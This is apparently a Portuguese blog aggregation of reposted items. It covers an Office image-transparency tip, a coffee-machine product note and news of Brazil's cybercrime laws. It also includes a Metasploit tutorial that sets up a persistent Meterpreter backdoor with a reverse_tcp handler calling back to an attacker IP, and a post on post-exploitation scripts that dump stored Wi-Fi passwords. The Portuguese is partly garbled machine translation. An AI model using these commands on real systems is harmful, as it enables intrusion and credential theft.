Ajustar transparência de uma imagem no Office

Inserir Figura como AutoForma

Se quiser controlar o grau de transparência de uma imagem, siga os passos abaixo.

Vá no menu Inserir e clique em Formas e selecione Retângulo:

Desenhe um retâgulo no corpo do Documento do tamanho aproximado da figura que você deseja inserir:

Selecione a AutoForma, clique no menu Ferramentas de Desenho e selecione Imagem…:

Na janela que aparecer, selecione a figura desejada e clique em Inserir:

A imagem aparecerá no corpo do Documento:

Para remover as bordas azuis, selecione a imagem e vá em Ferramentas de Desenho, Contorno da Forma e selecione Sem Contorno:

Com a imagem selecionada, clique com o botão direito e selecione Formatar Forma…:

Uma janela aparecerá. Vé em Preenchimento, ajuste o nível de Transparência desejado e, em seguida, clique em Fechar:

Observe agora que a figura apresenta transparência:

Para que o texto sobreponha a imagem, com a figura selecionada, clique em Ferramentas de Imagem e selecione Atrás do texto:

Pronto, agora você tem uma imagem que foi criada através de uma AutoForma transparente:

 

Fonte:AmbienteOffice

Anúncios

Mantendo acesso no host comprometido

Galera, tutorial está parte dele em inglês.

Algumas pessoas e ACERCA estudante pedindo o que devemos fazer depois de explorar com sucesso comprometer ou vítima?

Alguns explorar Tal como CVE-2010-3962 quando a vítima Executado pode fazer computador trava. Quando algum usuário de computador trava optar por reiniciar o computador e ele vai fazer o exploit Torna-se ineficaz anterior.

O que vamos fazer aqui é Mantendo o acesso, a deixar-se uma maneira mais fácil de volta para o sistema posteriormente. Ao utilizar este método, se o serviço é para baixo ou você explorados atualizado, você ainda pode ganhar acesso ao sistema para uso futuro.

O Serviço Meterpreter Metasploit persistente é o que vamos usar neste tutorial, mas não há aviso Quando você usa esse Meterpreter persistente como mostrado neste tutorial requer nenhuma autenticação. Isto significa que ganha acesso a qualquer um que possa acessar a porta de sua porta de trás! Esta não é uma coisa boa se você está conduzindo um teste de penetração, este poderia ser como um risco significativo.

Requirement :

1. Backtrack 5 (or other Linux OS)

2. Metasploit Framework 3 (Included in Backtrack 5)

Step By Step :

1. You need to set your payload of your exploit to meterpreter to do this method.

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

2. run persistence -h to view help list

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

3. We will configure our persistent Meterpreter session to wait until a user logs on to the remote system and try toconnect back to our listener every 5 seconds at IP address 192.168.8.89 on port 8080.

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

Notice that the script output gives you the command to “remove” the persistent listener when you are done with it. Be sure to make note of it so you don’t leave an unauthenticated backdoor on the system.

Explanation :

-U : start the backdoor when user log in to system

-i : load backdoor every 5 second

-p : will running on port 8080

-r : connect back to 192.168.8.90 (specified ip address)

4. To make sure that it works, try reboot the remote system and set up our payload handler.

msf> use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.8.90
LHOST => 192.168.8.90
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.8.90:8080
[*] Starting the payload handler...

5. When the remote user restart the system and re-login to the system, there should be like this(we should wait until the backdoor executed by remote system) :

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

Let we see what happen to remote user :

5 Steps to Set Up Backdoor After Successfully Compromising Target Using Backtrack 5

There’s established connection between attacker and remote host.

Hope it’s useful :-)

Fonte:VishnuValentino

Wireless Scripts para Meterpreter

Esses scripts fornecer funcionalidade relacionada com o tema sem fio ou redes sem fio. O objectivo destes é o de extrair o máximo de informação que pode existir perfis sem fios armazenado na máquina violados. No Windows 7 ou Vista você obter a senha para redes WPA, enquanto o Windows XP é obtido PBKDF2 chave derivada.

O script de post/windows/wlan/wlan_bss_list fornece informações sobre as redes sem fio que tenha violado a máquina configurada. O script de pós / windows / WLAN / wlan_current_connection rede WiFi mostra que a máquina está ligada comprometida, se ele estiver conectado a um. O post script / windows / wlan / wlan_disconnect tentar desligar o aparelho violado a conexão sem fio. E, finalmente, o post script / windows / wlan / wlan_profile recupera informações em formato XML, referindo-se a redes sem fio configurados na máquina violada, incluindo informações como a senha da rede Wi-Fi.

Uma vez que você tem uma sessão Meterpreter, a primeira ação que ocorre é fazer uma lista de redes sem fio que o aparelho armazenar, este fato significa que, geralmente, em algum momento violou a máquina está ligada a essas redes .

 

Com o script de post/windows /wlan /wlan_profile pode obter um despejo de um arquivo em formato XML com os detalhes de redes sem fio, incluindo senhas esta informação para se conectar a redes sem fio. Na foto você pode ver uma parte do depósito, a parte em que informações sensíveis, como senha e nome da rede.

 

Finalmente, você também pode realizar esta operação através da linha de comando da máquina violados. Para abrir uma linha de comando comando é executado Meterpreter shell e digite netsh wlan mostra perfil para recuperar informações de redes sem fio configurados na máquina violados.

Fonte:FluProject

 

Cafeteira em Forma de Motor V12

 

Cafeteira-Expresso-Veloce-V12

A incrível máquina de café Expresso Veloce vai deixar suas visitas boquiabertas!

A cafeteira Expresso Veloce V12 tem a forma de um motor de corrida V12 feito com materiais nobres como titânio, magnésio e alumínio. A cafeteira faz um delicioso café estilo italiano, é feita à mão e tem edição limitada em 500 unidades.

A cafeteira também está disponível na versão motor V10 e o preço só sob consulta, mas já dá para prever que é bem alto.

Fonte:DigitalDrops

WDivulge, Descubrindo pastas e arquivos ocultos

As auditorias web, é imprescindível a utilização de uma ferramenta como “enumeração. Isto ajuda-nos a encontrar painéis de administração, diretório com informações confidenciais. E até mesmo diretórios com permissões incorretas que permitem que lista arquivos.

Faça o download da ferramenta e ver listas de arquivos que vai procurar

darkmac:lists marc$ more files.txt
“pictures”[###]\”.jpg”
“DCP_”[####]\”.jpg”
“IMG_”[####]\”.jpg”
“”[##]\”.jpg”
“dsc”[#####]\”.jpg”
“dscn”[####]\”.jpg”
“mvc-”[###]\”.jpg”
“mvc”[#####]\”.jpg”
“P101″[####]\”.jpg”
“IMG_”[###]\”.jpg”
“IMAG”[####]\”.jpg”
“_MG_”[####]\”.jpg”
“dscf”[####]\”.jpg”
“pdrm”[####]\”.jpg”
“IM”[######]\”.jpg”
“EX”[######]\”.jpg”
“pict”[####]\”.jpg”
“P”[#######]\”.JPG”
“IMGP”[####]\”.JPG”
“PANA”[####]\”.JPG”
“Image(“[##]\”).JPG”
“DSCI”[####]\”.JPG”
“PICT”[#####]\”.jpg”
“HPIM”[####]\”.jpg”
“DSCN”[####]\”.jpg”
“DSC”[#####]\”.jpg”
“IMG_”[#####]\”.jpg”
darkmac:lists marc$

Podemos modificar esta lista a adicionar as nossas.

Lançamos a ferramenta contra um servidor web em um ambiente controlado.

O pedido irá tornar a ferramenta é como se segue:

“GET /pictures298.jpg HTTP/1.1″

Se vemos que os pedidos estão surgindo realmente, podemos ver os logs do servidor

Como você pode ver a ferramenta está a tentar combinações diferentes, se, por exemplo, deseja bloquear este difusor, poderíamos criar algo como:

#Block scanners
 <Directory / >
     BrowserMatch ^wdivulge deny_host
     Deny from env=deny_host
  </Directory>

Temos uma ferramenta mais para o nosso arsenal!

Fonte:Flu

Lei dos Crimes Cibernéticos entrará em vigor em 02/04/2013

Amanhã (dia 02/04/2013) entrarão em vigor as leis 12.735/2012 e 12.737/2012. Abaixo listo alguns artigos interessantes sobre o impacto das novas leis para os profissionais de segurança brasileiros (especialmente os que fazem pentest e pesquisa de vulnerabilidades) e demais atores que agora passam a estar sujeitos às penas previstas nas novas legislações, que determinam para o crime de invasão de dispositivos – por exemplo – até dois anos de prisão.

Ainda sobre o tema, o site InternetLegal possui uma listagem exaustiva das “Principais Leis Federais sobre Informática, Telemática, Internet” – http://www.internetlegal.com.br/biblioteca/legislacao/\

Fonte:SandroSuffert